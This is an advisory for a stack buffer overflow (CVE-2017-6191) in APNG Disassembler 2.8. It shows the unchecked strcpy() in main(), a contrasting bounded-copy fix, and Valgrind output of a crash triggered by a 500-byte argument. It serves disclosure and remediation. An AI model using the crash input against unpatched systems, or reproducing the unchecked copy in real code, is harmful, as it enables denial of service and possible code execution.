# Exploit Title: APNGDis filename Buffer Overflow
# Date: 14-03-2017
# Exploit Author: Alwin Peppels
# Vendor Homepage: http://apngdis.sourceforge.net/
# Software Link: https://sourceforge.net/projects/apngdis/files/2.8/
# Version: 2.8
# Tested on: Linux Debian / Windows 7
# CVE : CVE-2017-6191
A textbook stack-based buffer overflow: main() declares a fixed-size buffer szPath[256] on the stack and copies the first command line argument into it with strcpy(), without checking its length. Any argument longer than 255 bytes writes past the end of szPath into the neighbouring stack variables and, for long enough input, the saved frame pointer and return address.
The relevant part of main() in apngdis.cpp (2.8), with the headers it needs added for context; the element type of `frames` is the one shown in the Valgrind backtrace:

    #include <cstdio>
    #include <cstring>
    #include <vector>

    int main(int argc, char** argv)
    {
      unsigned int i, j;
      char * szInput;
      char * szOutPrefix;
      char   szPath[256];        // fixed-size stack buffer
      char   szOut[256];
      std::vector<APNGFrame> frames;

      printf("\nAPNG Disassembler 2.8\n\n");

      if (argc > 1)
        szInput = argv[1];       // attacker-controlled, length never checked
      else
      {
        printf("Usage: apngdis anim.png [name]\n");
        return 1;
      }

      strcpy(szPath, szInput);   // overflows szPath when argv[1] is longer than 255 bytes
      /* ... rest of main() omitted ... */
    }
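To make the fix concrete, here is an added example (not apngdis code) that puts the unchecked strcpy() pattern from main() next to a bounded copy that rejects oversized arguments instead of silently truncating them. The function names copy_path_unchecked, copy_path_bounded and run_main_checked, and the 256-byte PATH_BUF size mirroring szPath, are assumptions made for this demo.

```c
/* Added example, not code from apngdis: vulnerable copy vs. a fail-closed copy. */
#include <stdio.h>
#include <string.h>

#define PATH_BUF 256   /* assumption: same size as szPath[256] in apngdis 2.8 */

/* Vulnerable pattern, kept only for comparison: no length check, so a
 * 500-byte argv[1] writes 244 bytes past the end of a 256-byte buffer. */
void copy_path_unchecked(char *dst, const char *src)
{
    strcpy(dst, src);
}

/* Hardened pattern: copy only if src (including its NUL) fits in dst.
 * memchr() bounds the scan to cap bytes, so an unterminated source cannot
 * run past the buffer either. Returns 0 on success, -1 if it does not fit.
 * Rejecting is preferable to snprintf()-style truncation here: a silently
 * shortened path would make the program open a different file. */
int copy_path_bounded(char *dst, size_t cap, const char *src)
{
    const char *end = memchr(src, '\0', cap);
    if (end == NULL)          /* no NUL within cap bytes: too long */
        return -1;
    size_t n = (size_t)(end - src);
    memcpy(dst, src, n + 1);  /* n + 1 <= cap, NUL included */
    return 0;
}

/* Argument handling as main() should do it: returns 0 on success and 1 on a
 * usage or length error, matching apngdis's own non-zero usage exit code. */
int run_main_checked(int argc, char **argv, char *out_path, size_t cap)
{
    if (argc < 2) {
        fprintf(stderr, "Usage: apngdis anim.png [name]\n");
        return 1;
    }
    if (copy_path_bounded(out_path, cap, argv[1]) != 0) {
        fprintf(stderr, "input path too long (max %zu bytes)\n", cap - 1);
        return 1;
    }
    return 0;
}

int main(int argc, char **argv)
{
    char szPath[PATH_BUF];
    int rc = run_main_checked(argc, argv, szPath, sizeof szPath);
    if (rc == 0)
        printf("Reading '%s'\n", szPath);
    return rc;
}
```

Compile with `cc -Wall -fstack-protector-strong` and pass a 500-character argument: the bounded version exits with status 1 and an error message, whereas the strcpy() version would, as in the Valgrind trace, corrupt the stack before any file is opened.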
Running the binary under Valgrind with 500 * "A" as the argument shows the consequence: the copy overruns szPath and clobbers a pointer further up main's stack frame, so when load_apng() (apngdis.cpp:200) prints the input name with printf("%s"), strlen() dereferences 0x4141414141414141 and the process dies with SIGSEGV:
    APNG Disassembler 2.8

    ==12096== Invalid read of size 1
    ==12096==    at 0x4C2EDA2: strlen (vg_replace_strmem.c:454)
    ==12096==    by 0x5B6ADA2: vfprintf (vfprintf.c:1637)
    ==12096==    by 0x5B711F8: printf (printf.c:33)
    ==12096==    by 0x109F05: load_apng(char*, std::vector<APNGFrame, std::allocator<APNGFrame> >&) (apngdis.cpp:200)
    ==12096==    by 0x10B24E: main (apngdis.cpp:498)
    ==12096==  Address 0x4141414141414141 is not stack'd, malloc'd or (recently) free'd
    ==12096==
    ==12096==
    ==12096== Process terminating with default action of signal 11 (SIGSEGV)
    ==12096==  General Protection Fault
    ==12096==    at 0x4C2EDA2: strlen (vg_replace_strmem.c:454)
    ==12096==    by 0x5B6ADA2: vfprintf (vfprintf.c:1637)
    ==12096==    by 0x5B711F8: printf (printf.c:33)
    ==12096==    by 0x109F05: load_apng(char*, std::vector<APNGFrame, std::allocator<APNGFrame> >&) (apngdis.cpp:200)
    ==12096==    by 0x10B24E: main (apngdis.cpp:498)
    Reading '==12096==
    ==12096== HEAP SUMMARY:
    ==12096==     in use at exit: 0 bytes in 0 blocks
    ==12096==   total heap usage: 2 allocs, 2 frees, 73,728 bytes allocated
    ==12096==
    ==12096== All heap blocks were freed -- no leaks are possible
    ==12096==
    ==12096== For counts of detected and suppressed errors, rerun with: -v
    ==12096== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0)
    Segmentation fault